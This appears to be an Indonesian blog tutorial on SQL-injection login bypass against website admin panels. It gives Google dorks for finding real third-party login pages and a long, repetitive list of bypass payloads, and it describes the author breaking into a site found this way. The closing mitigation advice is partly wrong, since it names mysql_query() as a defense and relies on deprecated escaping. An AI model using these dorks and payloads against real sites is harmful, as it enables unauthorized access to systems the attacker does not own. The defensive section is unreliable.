SQL Injection Ke Admin Panel

SQL Injection adalah salah satu teknik exploit dengan memanfaatkan kelemahan pada database. Pada umumnya ini di inject ( suntik) kedalam form yang membutuhkan input dari user, misalnya buku tamu, komentar, login user , login admin dll.

Kali ini saya akan membagi pengetahuan untuk melakukan injection ke login admin, saya tulis disini sebagai pembelajaran saja agar rekan rekan lebih aware ke keamanan databasenya. Segala resiko tanggung jawab sendiri ya, sekali lagi saya hanya menyajikan dalam kerangka edukasi.

Saya gunakan teknik yang paling sederhana yaitu menggunakan Google Dork di Google Hacking Database, untuk menemukan sasaran yang vulnerable.

Okay.. google dork yang kita akan pakai ada beberapa antara lain , cobain sendiri ya :

• nurl:manager intitle:Admin Panel
• inurl:/admin2/ ext:php inurk:/admin/ ext:php
• inurl:/adminpanel/ ext:php
• inurl:/admin_panel/
• inurl:/login.php
• inurl:/admin.php
• inurl:/admin
• inurl:/login.html

zz1

Hasilnya kira kira akan nada list seperti dibawah ini :

zz2

Demikian hasil dari Google Dork tersebut, tapi apakah semua vulnerable ? belum tentu , di step ini kita harus satu persatu mencoba dengan memasukkan SQL Injection nya.

Nah kita asumsikan sudah mendapatkan admin login , maka kita tinggal coba memasukkan kombinasi rangkaian user dan password sebagai injection nya.

User Name : 

• ' or 1=1 limit 1 -- -+
• "' OR 1=1 "
• admin

Password :

• ' or 1=1 limit 1 -- -+
• or ‘1’=’1
• ' or '1'='1
• ' or 'x'='x
• ' or 0=0 --
• " or 0=0 --
• or 0=0 --
• ' or 0=0 #
• " or 0=0 #
• or 0=0 #
• ' or 'x'='x
• " or "x"="x
• ') or ('x'='x
• ' or 1=1--
• " or 1=1--
• or 1=1--
• ' or a=a--
• " or "a"="a
• ') or ('a'='a
• ") or ("a"="a
• hi" or "a"="a
• hi" or 1=1 --
• hi' or 1=1 --
• 'or'1=1'
• ==
• and 1=1--
• and 1=1
• ' or 'one'='one--
• ' or 'one'='one
• ' and 'one'='one
• ' and 'one'='one--
• 1') and '1'='1--
• admin' --
• admin' #
• admin'/*
• or 1=1--
• or 1=1#
• or 1=1/*
• ) or '1'='1--
• ) or ('1'='1--
• ' or '1'='1
• ' or 'x'='x
• ' or 0=0 --
• " or 0=0 --
• or 0=0 --
• ' or 0=0 #
• " or 0=0 #
• or 0=0 #
• ' or 'x'='x
• " or "x"="x
• ') or ('x'='x
• ' or 1=1--
• " or 1=1--
• or 1=1--
• ' or a=a--
• " or "a"="a
• ') or ('a'='a
• ") or ("a"="a
• hi" or "a"="a
• hi" or 1=1 --
• hi' or 1=1 --
• 'or'1=1'

Banyak amat yak ? Hahaha namanya juga mencari kelemahan supaya bisa di exploit jadi caranya ya trial and error, melakukan hacking nomor satu butuh kesabaran.

Ahaa saya coba hasil googlingan tadi , sepertinya saya menemukan salah satu yang vulnerable , kita coba masuk dengan kombinasi user and password diatas

zz3

Jeng Jeng…hasilnya :

zz4

Kan..sekarang sudah berhasil masuk ke backendnya, pada step ini kita berhasil membuktikan bahwa SQL Injectionnya berhasil, terserah hacker nya sebenarnya mau diapain saja, cuma saran saya sih sebaiknya kabari adminnya agar mereka bisa segera menutupi exploit tersebut. Saya tidak menyarankan di deface atau di rubah tampilan atau malah di rusak website nya, membangun website itu butuh tenaga dan biaya jadi ngeselin juga kalau tampilannya kena hack, saya sendiri beberapa kali kena hack juga jadi bisa ngerasain jengkelnya website itu di obrak abrik sama orang.

Solusi :

Beberapa hal yang bisa dilakukan adalah ( bahasa nya teknis banget proggraming ini ), hahahha :

• Gunakan mysql real escape string ()
• Gunakan mysql_query ()
• Hapus pesan kesalahan atau ganti tampilannya, karena Error Message dapat digunakan untuk menelusuri jalur database.
• Batasi akses permisiion ( CHMOD ) hanya kepada user yang berhak.
• Lakukan perlindungan terhadap query SQL dengan menerapkan teknik sanitasi (mengosongkan) seluruh input yang diterima dari permintaan objek ASP (seperti: Request, Request.QueryString, Request.Form, Request.Cookies dan Request.ServerVariabbles).
• Gunakan GreenSQL untuk melakukan penyaringan awal, disini Green SQL berlaku sebagai firewall yang akan memfilter perintah yang mengarah ke database. Kelebihan yang dipergunakan oleh GreenSQL adalah menggunakan  metoda "risk Scoring matrix". Risk Scoring Matrix itu sendiri merupakan sebuah analisa perhitungan resiko untuk melakukan proses "blocking" terhadap perintah-perintah yang dikenal sebagai perintah SQL Administrative ( Drop, Create, Alter) dan  perintah perintah SQL lain yang sifatnya membahayakan database tersebut. GreenSQL bekerja sebagai sebuah reverse Proxy, yang berarti kalau ada perintah SQL yang diberikan akan di send terlebih dahulu ke GreenSQL Server untuk dianalisa, jika hasil analisa menunjukan bahwa perintah yang dimasukkan tidak berbahaya maka akan diteruskan ke MySQL Server sebagai real database servernya.

Kesimpulan :

Teknik SQL Injection dapat digunakan untuk memanipulasi content dari sebuah website, salah satunya melewati login di bagian back end ( administrator login). Teknik ini memanfaatkan kelemahan pada database. Oleh karena itu diperlukan usaha untuk memproteksi database tersebut sedemikian rupa sehingga hasil inputan user tidak bisa digunakan untuk membypass login admin atau bahkan untuk men deface ( mengganti tampilan website)

Referensi

https://wahyualamsyah.wordpress.com/2011/01/05/sql-injection-dan-bagaimana-cara-mengatasi/

http://ibn-hacker27.heck.in/cara-mengamankan-website-dari-seranagn-s-2.xhtml

http://tutorq.blogspot.co.id/2011/04/melindungi-data-anda-dari-serangan-sql.html

http://rpl-art.blogspot.co.id/2013/11/cara-melindungi-website-php-anda-dari.html

http://zerofreak.blogspot.co.id/2012/01/chapter2-basic-sql-injection-with-login.html

https://lwn.net/Articles/177037/

https://www.exploit-db.com/papers/13045/

http://www.thisislegal.com/tutorials/18

http://websec.ca/kb/sql_injection

http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/

Share this post